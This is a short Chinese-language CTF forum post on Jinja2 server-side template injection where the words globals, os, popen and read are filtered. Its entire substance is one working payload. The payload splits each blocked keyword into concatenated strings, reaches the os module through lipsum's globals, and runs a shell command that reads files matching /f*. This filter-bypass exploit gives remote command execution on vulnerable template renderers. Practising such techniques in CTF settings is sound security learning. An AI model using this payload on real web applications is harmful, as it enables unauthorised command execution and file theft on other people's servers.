CTF+广场
CTF+论坛
比赛大厅
学习大厅
知识库
CTF+ 课程
潜行模式
登录
注册
返回
1
0
jinja2模板注入,过滤了关键字globals,os,popen和read
弗洛游戏首席厨师长,2025-11-29 12:37
示例payload:使用lipsum中隐式导入的os模块:/{{lipsum['__glo''bals__']['o''s']['pop''en']("cat /f*")['re''ad']()}}
暂无回复。你的想法是什么?
登录以发布评论
1
1
每页数量
10
20
30
每页数量
10
GeeSec
商务合作
蜀ICP备2024047787号-2